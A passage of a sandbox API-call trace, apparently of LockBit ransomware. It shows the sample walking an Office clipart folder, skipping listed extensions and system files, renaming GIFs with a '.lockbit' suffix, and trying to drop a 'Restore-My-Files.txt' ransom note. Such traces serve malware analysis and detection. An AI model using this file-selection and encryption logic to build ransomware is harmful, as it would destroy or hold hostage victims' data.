lpString2=".GIF") returned 1 [0101.562] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0101.562] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0101.562] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0101.562] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF.lockbit") returned 72 [0101.562] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00164_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13e4 [0101.563] CreateIoCompletionPort (FileHandle=0x13e4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0101.563] malloc (_Size=0x40068) returned 0x3e30008 [0101.563] GetFileSizeEx (in: hFile=0x13e4, lpFileSize=0x3e30020 | out: lpFileSize=0x3e30020*=13254) returned 1 [0101.563] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.565] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.565] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e7003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e7003c) returned 0x0 [0101.565] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.566] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.566] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e7004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e7004c) returned 0x0 [0101.566] ReadFile (in: hFile=0x13e4, lpBuffer=0x3e3003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30008 | out: lpBuffer=0x3e3003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30008) returned 1 [0101.594] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0101.594] malloc (_Size=0xa6) returned 0x77d800 [0101.594] NtSetInformationFile (FileHandle=0x13e4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0101.595] free (_Block=0x77d800) [0101.595] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0101.595] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0101.595] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0101.595] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89b98100, ftCreationTime.dwHighDateTime=0x1bd4c12, ftLastAccessTime.dwLowDateTime=0x51317770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x89b98100, ftLastWriteTime.dwHighDateTime=0x1bd4c12, nFileSizeHigh=0x0, nFileSizeLow=0x2186, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00165_.GIF", cAlternateFileName="")) returned 1 [0101.595] lstrcmpiW (lpString1=".", lpString2="AG00165_.GIF") returned -1 [0101.595] lstrcmpiW (lpString1="..", lpString2="AG00165_.GIF") returned -1 [0101.595] PathFindExtensionW (pszPath="AG00165_.GIF") returned=".GIF" [0101.595] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0101.595] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0101.595] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0101.596] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0101.596] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0101.596] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0101.596] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0101.596] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0101.596] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0101.596] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0101.596] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0101.596] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0101.596] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0101.596] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0101.596] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0101.596] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0101.596] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0101.596] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0101.596] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0101.596] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0101.596] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0101.596] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0101.596] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0101.597] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0101.597] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.597] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0101.597] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0101.597] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0101.597] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0101.597] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0101.597] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0101.597] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0101.597] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0101.597] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0101.597] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0101.597] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0101.597] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0101.597] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0101.597] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0101.597] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0101.597] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0101.597] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0101.598] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.598] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0101.598] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0101.598] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0101.598] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0101.598] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AG00165_.GIF") returned 1 [0101.598] lstrcmpiW (lpString1="ntldr", lpString2="AG00165_.GIF") returned 1 [0101.598] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AG00165_.GIF") returned 1 [0101.598] lstrcmpiW (lpString1="bootsect.bak", lpString2="AG00165_.GIF") returned 1 [0101.598] lstrcmpiW (lpString1="autorun.inf", lpString2="AG00165_.GIF") returned 1 [0101.598] lstrcmpiW (lpString1="thumbs.db", lpString2="AG00165_.GIF") returned 1 [0101.598] lstrcmpiW (lpString1="iconcache.db", lpString2="AG00165_.GIF") returned 1 [0101.598] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0101.598] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned=".GIF" [0101.598] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0101.598] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0101.598] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0101.598] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0101.598] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0101.598] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0101.599] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0101.599] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0101.599] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0101.599] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0101.599] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0101.599] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0101.599] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0101.599] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0101.599] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0101.599] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0101.599] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0101.599] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0101.599] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0101.599] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0101.599] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0101.599] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0101.599] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0101.599] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0101.599] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0101.599] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0101.600] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0101.600] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0101.600] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF.lockbit") returned 72 [0101.600] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00165_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xcb0 [0101.608] CreateIoCompletionPort (FileHandle=0xcb0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0101.608] malloc (_Size=0x40068) returned 0x3d70048 [0101.608] GetFileSizeEx (in: hFile=0xcb0, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=8582) returned 1 [0101.608] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.610] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0101.610] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.611] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.612] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0101.612] ReadFile (in: hFile=0xcb0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0101.618] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0101.618] malloc (_Size=0xa6) returned 0x77d800 [0101.618] NtSetInformationFile (FileHandle=0xcb0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0101.619] free (_Block=0x77d800) [0101.619] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0101.619] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0101.619] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0101.619] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81614600, ftCreationTime.dwHighDateTime=0x1bd4c12, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x81614600, ftLastWriteTime.dwHighDateTime=0x1bd4c12, nFileSizeHigh=0x0, nFileSizeLow=0x131e, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00167_.GIF", cAlternateFileName="")) returned 1 [0101.619] lstrcmpiW (lpString1=".", lpString2="AG00167_.GIF") returned -1 [0101.619] lstrcmpiW (lpString1="..", lpString2="AG00167_.GIF") returned -1 [0101.619] PathFindExtensionW (pszPath="AG00167_.GIF") returned=".GIF" [0101.619] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0101.620] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0101.620] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0101.620] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0101.620] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0101.620] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0101.620] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0101.620] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0101.620] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0101.620] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0101.620] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0101.620] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0101.620] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0101.620] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0101.620] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0101.620] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0101.620] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0101.620] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0101.620] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0101.620] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0101.621] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0101.621] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0101.621] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0101.621] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0101.621] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.621] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0101.621] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0101.621] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0101.621] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0101.621] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0101.621] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0101.621] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0101.621] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0101.621] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0101.621] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0101.621] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0101.621] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0101.621] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0101.621] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0101.621] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0101.621] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0101.621] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0101.622] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.622] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0101.622] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0101.622] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0101.622] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0101.622] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AG00167_.GIF") returned 1 [0101.622] lstrcmpiW (lpString1="ntldr", lpString2="AG00167_.GIF") returned 1 [0101.622] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AG00167_.GIF") returned 1 [0101.622] lstrcmpiW (lpString1="bootsect.bak", lpString2="AG00167_.GIF") returned 1 [0101.622] lstrcmpiW (lpString1="autorun.inf", lpString2="AG00167_.GIF") returned 1 [0101.622] lstrcmpiW (lpString1="thumbs.db", lpString2="AG00167_.GIF") returned 1 [0101.622] lstrcmpiW (lpString1="iconcache.db", lpString2="AG00167_.GIF") returned 1 [0101.622] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0101.622] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned=".GIF" [0101.622] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0101.622] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0101.622] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0101.622] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0101.622] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0101.622] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0101.622] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0101.623] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0101.623] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0101.623] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0101.623] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0101.623] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0101.623] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0101.623] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0101.623] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0101.623] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0101.623] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0101.623] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0101.623] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0101.623] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0101.623] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0101.623] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0101.624] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0101.624] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0101.625] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0101.625] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0101.625] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0101.625] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0101.625] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF.lockbit") returned 72 [0101.625] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00167_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xcb4 [0101.626] CreateIoCompletionPort (FileHandle=0xcb4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0101.626] malloc (_Size=0x40068) returned 0x1ff1e60 [0101.626] GetFileSizeEx (in: hFile=0xcb4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4894) returned 1 [0101.626] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.628] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.628] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0101.628] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.630] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.630] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0101.630] ReadFile (in: hFile=0xcb4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0101.641] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0101.641] malloc (_Size=0xa6) returned 0x77d800 [0101.641] NtSetInformationFile (FileHandle=0xcb4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0101.642] free (_Block=0x77d800) [0101.642] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0101.642] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0101.642] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0101.642] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c9c9200, ftCreationTime.dwHighDateTime=0x1bd4c12, ftLastAccessTime.dwLowDateTime=0x5eb686b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7c9c9200, ftLastWriteTime.dwHighDateTime=0x1bd4c12, nFileSizeHigh=0x0, nFileSizeLow=0x14ff, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00169_.GIF", cAlternateFileName="")) returned 1 [0101.642] lstrcmpiW (lpString1=".", lpString2="AG00169_.GIF") returned -1 [0101.642] lstrcmpiW (lpString1="..", lpString2="AG00169_.GIF") returned -1 [0101.642] PathFindExtensionW (pszPath="AG00169_.GIF") returned=".GIF" [0101.642] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0101.642] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0101.643] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0101.643] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0101.643] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0101.643] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0101.643] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0101.643] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0101.643] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0101.643] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0101.643] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0101.643] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0101.643] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0101.643] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0101.643] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0101.643] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0101.643] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0101.643] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0101.643] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0101.643] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0101.643] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0101.643] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0101.643] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0101.644] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0101.644] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.644] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0101.644] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0101.644] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0101.644] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0101.644] lstrcmpiW (lpString1=".rom", lpString2=".GIF") 